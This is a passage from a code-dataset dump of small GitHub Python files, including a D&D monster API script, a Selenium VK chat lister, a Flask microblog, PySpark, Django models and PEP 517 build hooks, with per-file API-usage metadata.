"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path", "line_number": 792, "usage_type": "attribute"}, {"api_name": "librosa.display.load", "line_number": 805, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 805, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 807, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 807, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 807, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 818, "usage_type": "call"}, {"api_name": "os.path", "line_number": 818, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 819, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 820, "usage_type": "call"}, {"api_name": "os.path", "line_number": 820, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path", "line_number": 822, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 844, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 864, "usage_type": "call"}, {"api_name": "os.path", "line_number": 864, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 865, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 871, "usage_type": "call"}, {"api_name": "os.path", "line_number": 871, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 873, "usage_type": "call"}, {"api_name": "os.path", "line_number": 873, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 874, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 885, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 890, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path", "line_number": 901, "usage_type": "attribute"}, {"api_name": "joblib.delayed", "line_number": 911, "usage_type": "call"}, {"api_name": 
"joblib.Parallel", "line_number": 923, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path", "line_number": 967, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path", "line_number": 975, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 976, "usage_type": "call"}, {"api_name": "os.path", "line_number": 976, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 976, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 977, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 983, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 984, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 984, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 984, "usage_type": "call"}, {"api_name": "os.path", "line_number": 984, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 988, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 988, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 988, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1014, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1014, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 1015, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 1015, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1017, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1018, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1032, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1032, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 1039, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 1040, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 1040, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1040, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 1044, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 1044, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 1044, "usage_type": "name"}, {"api_name": "librosa.display.feature.melspectrogram", "line_number": 1045, "usage_type": "call"}, {"api_name": "librosa.display.feature", "line_number": 1045, "usage_type": 
"attribute"}, {"api_name": "librosa.display", "line_number": 1045, "usage_type": "name"}, {"api_name": "constants.model_params", "line_number": 1047, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1065, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1068, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1070, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1083, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1084, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 1090, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1093, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1093, "usage_type": "attribute"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 1094, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 1094, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1098, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1103, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1111, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1122, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1129, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 1135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 1166, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1169, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1179, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1180, "usage_type": "call"}, {"api_name": "constants.model_params", "line_number": 1192, "usage_type": "name"}, {"api_name": "numpy.ceil", "line_number": 1208, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1228, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1230, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1232, "usage_type": "call"}]}
+{"seq_id": "71567644649", "text": "import requests\r\nimport random\r\n\r\ndef monster():\r\n response2 = requests.get('http://www.dnd5eapi.co/api/monsters')\r\n a2 = response2.json()\r\n\r\n lista2 = a2['results']\r\n\r\n c = len(lista2) - 1\r\n monsters = []\r\n for item in lista2:\r\n monsters.append(lista2[c]['index'])\r\n c -= 1\r\n\r\n random_monster = random.choice(monsters)\r\n response3 = requests.get('http://www.dnd5eapi.co/api/monsters/'+ random_monster)\r\n d = response3.json()\r\n print('Name: {}, Type: {}, Hit points: {}, Hit dice: {}, Armor class: {}'.format(d['name'], d['type'], d['hit_points'], d['hit_dice'], d['armor_class']))\r\n\r\n\r\n\r\n", "repo_name": "Babalmar/D-D-Requests", "sub_path": "monsters.py", "file_name": "monsters.py", "file_ext": "py", "file_size_in_byte": 633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "25705455774", "text": "from selenium import webdriver\r\nfrom time import sleep\r\nimport json\r\n\r\ndriver = webdriver.Chrome(r'C:\\\\chromedriver_95.0.4638.54.exe')\r\ndriver.get(\"https://vk.com\")\r\n\r\nauth = input(\"Press any key when you have login to your page...\")\r\ncount = int(input(\"Enter how a lot of chats you wanna check (number): \"))\r\nkeyword = input(\"Enter keyword to find if you want: \")\r\n\r\nchats = {}\r\nfor x in range(1, count+1):\r\n try:\r\n driver.get(f\"https://vk.com/im?sel=c{x}\")\r\n sleep(2)\r\n \r\n element = driver.find_element_by_xpath('//a[@class=\"im-page--title-main-inner _im_page_peer_name\"]')\r\n chatname = element.get_attribute(\"innerHTML\").replace(\" \",\"\")\r\n chats[x]=chatname\r\n \r\n if keyword in chatname:\r\n exit()\r\n \r\n x+=1\r\n except Exception:\r\n pass\r\nwith open(\"chats.json\",\"w\", encoding='utf8') as file:\r\n json.dump(chats,file,ensure_ascii=False)", "repo_name": "syaveloo/demonstration", "sub_path": "chats/give_me_my_chats_vk.py", "file_name": "give_me_my_chats_vk.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "37094566010", "text": "#This program prints one date minus of the date provided to the user.\n#Give input as\n#1\tno of testcases\n#24 April 1994\ttest cases\nimport datetime\nfrom datetime import date, timedelta\nn = input();\nwhile n > 0:\n\tdate = raw_input(); day, month, year = date.split();\n\tassert(int(day) > 0 & int(day) < 31)\n\t#print(day+\" \"+month+\" \"+year)\n\tmap = {'January':1, 'February':2, 'March':3, 'April':4, 'May':5, 'June':6, 'July':7, 'August':8, 'September':9, \t\t'October':10, 'November':11, 'December':12}\n\tmlist = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', \t\t\t'December']\n\tmydate = (datetime.date(int(year), map[month], int(day))) #year, month, day\n\t#mydate =mydate+datetime.timedelta(years=40)\n\tmydate = mydate - datetime.timedelta(days = 1)\n\tmydate = mydate.isoformat();\n\t#print(mydate)\n\tyear, month, day = mydate.split('-')\n\t#print(year+\" \"+month+\" \"+day)\n\t#print(mydate.strftime(\"%Y-%m-%d\"))\n\t#year = mydate.strftime(\"%Y\");\n\tif(int(month) < 10):\tmonth = month.strip(\"0\");\n\t#day = mydate.strftime(\"%d\");\n\tif(int(day) < 10):\tday = day.strip(\"0\")\n\t#print(month);\n\tprint(day + \" \" + mlist[int(month) - 1] + \" \" + year);\n\tn -= 1;\n", "repo_name": "pushkarlaulkar/competitiveprogramming", "sub_path": "printpreviousdate.py", "file_name": "printpreviousdate.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.split", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "33753704375", "text": "# flaskr microblogging app\n\nimport dataset\n\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n# connecting to a SQLite database\ndb = dataset.connect('sqlite:///myflaskr.db')\ntable = db['postings']\n\n# create the application\napp = Flask(__name__)\n\n# show all the posting\n\n\n@app.route(\"/\")\ndef show_postings():\n postings = table.find() # to reverse order, table.find(order_by='-id')\n return render_template('show_postings.html', postings=postings)\n\n\n@app.route(\"/add\", methods=['POST']) # only accept connections which POST\ndef add_posting():\n table.insert(dict(title=request.form['title'], text=request.form['text']))\n flash(\"New posting successful\")\n return redirect(url_for('show_postings'))\n\nif __name__ == '__main__':\n app.debug = \"TRUE\"\n app.secret_key = \"secret\"\n app.run()\n", "repo_name": "oatnog/flaskr", "sub_path": "flaskr.py", "file_name": "flaskr.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataset.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "23876414383", "text": "#qzznb!\nfrom __future__ import print_function\nfrom pyspark import SparkContext\nimport json\ndef fun(record):\n if record[0] == 'a':\n return (record[2],record)\n elif record[0] == 'b':\n return (record[1],record)\n\ndef mul(lists):\n sz = len(lists)\n res = []\n for x in range(sz):\n for y in range(x+1,sz):\n #print(x,y)\n #print(lists[x][0],lists[y][0])\n \n if lists[x][0] == \"a\" and lists[y][0] == \"b\":\n res.append(((lists[x][1],lists[y][2]),lists[x][3]*lists[y][3]))\n elif lists[x][0] == \"b\" and lists[y][0] == \"a\":\n res.append(((lists[y][1],lists[x][2]),lists[x][3]*lists[y][3]))\n \n return res\n\nsc = SparkContext('local', 'test')\ntextFile = sc.textFile(\"file:///root/bigdata/inputs//6.json\")\nans = textFile.map(lambda row: fun(json.loads(row))).groupByKey().flatMap(lambda x: mul(list(x[1]))).reduceByKey(lambda x,y:x+y).map(lambda x: [[x[0][0],x[0][1]],x[1]])\nans.foreach(print)\n", "repo_name": "Ryan0v0/BUAA_BigDataCourse", "sub_path": "problem6/pyspark/problem6_spark.py", "file_name": "problem6_spark.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "21651703787", "text": "from helper.cEmbed import granted_msg, denied_msg\n\nclass LeaderBoard():\n def Standings(self, lst):\n i = 1\n ids = handles = ratings = \"\"\n for (h, r) in sorted(lst, key = lambda x: x[1], reverse = True):\n ids += \"**\" + str(i) + \"**\" +'\\n'\n if i == 1: handles += h + \":crown:\" + \"\\n\"\n else: handles += h + \"\\n\"\n ratings += str(r) + \"\\n\"\n i += 1\n\n if len(ids) == 0: return denied_msg(\"Warning\", \"The Leaderboard is Still Empty.\")\n\n response = granted_msg(\"CodeForces Standings\")\n\n response.add_field(name = \"#\", value = ids, inline = True)\n response.add_field(name = \"Handle\", value = handles, inline = True)\n response.add_field(name = \"Rating\", value = ratings, inline = True)\n\n return response\n", "repo_name": "KhaledChehabeddine/aub_cp_discord_bot", "sub_path": "helper/LeaderBoard.py", "file_name": "LeaderBoard.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "helper.cEmbed.denied_msg", "line_number": 14, "usage_type": "call"}, {"api_name": "helper.cEmbed.granted_msg", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "4931263659", "text": "import random\nimport string\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser, UserManager\n\n\nclass AdminManager(UserManager):\n def get_queryset(self):\n return super().get_queryset().filter(is_superuser=True)\n\n\nclass User(AbstractUser):\n class Type(models.IntegerChoices):\n USER = 0, 'Пользователь без прав'\n VERIFIED = 1, 'Пользователь'\n ADMIN = 2, 'Администратор'\n\n users = UserManager()\n admins = AdminManager()\n type = models.IntegerField(default=Type.USER, choices=Type.choices)\n date_of_birth = models.DateField(null=True)\n token = models.CharField(max_length=255, default='')\n\n def update_token(self):\n token = str()\n for _ in range(20):\n token += random.choice(string.ascii_letters+string.digits)\n\n self.token = token\n self.save()\n\n def __str__(self):\n return str(self.username)\n\n\nclass Platform(models.Model):\n platforms = models.Manager()\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Платформа'\n verbose_name_plural = 'Платформы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='categories',\n verbose_name='Платформа',\n )\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n description = models.CharField(\n max_length=255,\n verbose_name='Описание категории',\n null=True,\n blank=True,\n )\n parent = models.ForeignKey(\n to='self',\n on_delete=models.CASCADE,\n related_name='children',\n null=True,\n blank=True,\n verbose_name='Родитель',\n )\n xml_feed = models.CharField(\n max_length=255,\n verbose_name='Значение для XML фида',\n null=True,\n blank=True,\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def get_full_name(self):\n name_list = [self.name]\n parent = self.parent\n while parent:\n name_list.append(parent.name)\n parent = parent.parent\n\n full_name = ' - '.join(reversed(name_list))\n return full_name\n\n def __str__(self):\n return self.name\n\n\nclass Project(models.Model):\n uid = models.IntegerField()\n projects = models.Manager()\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n user = models.ForeignKey(\n to=User,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n name = models.CharField(max_length=255, verbose_name='Название')\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Проект'\n verbose_name_plural = 'Проекты'\n\n def __str__(self):\n return self.name\n\n\nclass ProjectCategory(models.Model):\n project = models.ForeignKey(\n to=Project,\n on_delete=models.CASCADE,\n related_name='categories',\n )\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n", "repo_name": 
"archon1999/PlatformXMLGenerator", "sub_path": "app/apps/backend/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.models.UserManager", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AbstractUser", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.IntegerChoices", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.UserManager", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 28, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 58, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 64, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 69, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 77, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 83, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": 
"django.db.models.DateTimeField", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 114, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 115, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 115, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 117, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 120, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 125, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 126, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 126, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 139, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 139, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 140, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 142, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 145, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 147, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 147, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 149, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 149, "usage_type": "name"}]}
+{"seq_id": "34046069669", "text": "\"\"\"\nPEP 517 build hooks\n\"\"\"\n\n\nfrom __future__ import annotations\nfrom typing import Mapping, Any\nimport os\nimport setuptools.build_meta as build_meta\n\n__all__ = [\n \"_supported_features\",\n \"build_sdist\",\n \"build_wheel\",\n \"build_editable\",\n \"get_requires_for_build_sdist\",\n \"get_requires_for_build_wheel\",\n \"get_requires_for_build_editable\",\n \"prepare_metadata_for_build_wheel\",\n \"prepare_metadata_for_build_editable\",\n]\n\nfrom pathlib import Path\nfrom loguru import logger\n\nfrom .project import Project\n\n\ndef _supported_features():\n return [\"build_editable\"]\n\n\ndef build_sdist(\n sdist_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: build_sdist\")\n return build_meta.build_sdist(sdist_directory, config_settings)\n\n\ndef build_wheel(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_wheel\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n project = Project(Path.cwd())\n return project.build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef build_editable(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_editable\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n # If not invoked indirectly by cxbuild itself do the default action\n if not os.environ.get('CBX_ACTIVITY'):\n return build_meta.build_editable(wheel_directory, config_settings, metadata_directory)\n return build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef get_requires_for_build_sdist(\n config_settings: dict[str, str | list[str]] | None = None # noqa: ARG001\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_sdist\")\n return build_meta.get_requires_for_build_sdist(config_settings)\n\n\ndef get_requires_for_build_wheel(\n config_settings: Mapping[str, Any] | None = None\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_wheel\")\n #return []\n return build_meta.get_requires_for_build_wheel(config_settings)\n\n\ndef get_requires_for_build_editable(self, config_settings=None):\n logger.debug(\"Build hook: get_requires_for_build_editable\")\n return get_requires_for_build_wheel(config_settings)\n\n\ndef prepare_metadata_for_build_wheel(\n metadata_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: prepare_metadata_for_build_wheel\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n\n\ndef prepare_metadata_for_build_editable(metadata_directory, config_settings=None):\n logger.debug(\"Build hook: build_editable\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n", "repo_name": "crungelab/cxbuild", "sub_path": "cxbuild/backend.py", "file_name": "backend.py", "file_ext": "py", "file_size_in_byte": 2998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "loguru.logger.debug", "line_number": 37, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "setuptools.build_meta.build_sdist", "line_number": 38, "usage_type": "call"}, {"api_name": 
"setuptools.build_meta", "line_number": 38, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 46, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "project.Project", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path.cwd", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "project.build_wheel", "line_number": 49, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 57, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 57, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 58, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 58, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 60, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 60, "usage_type": "attribute"}, {"api_name": 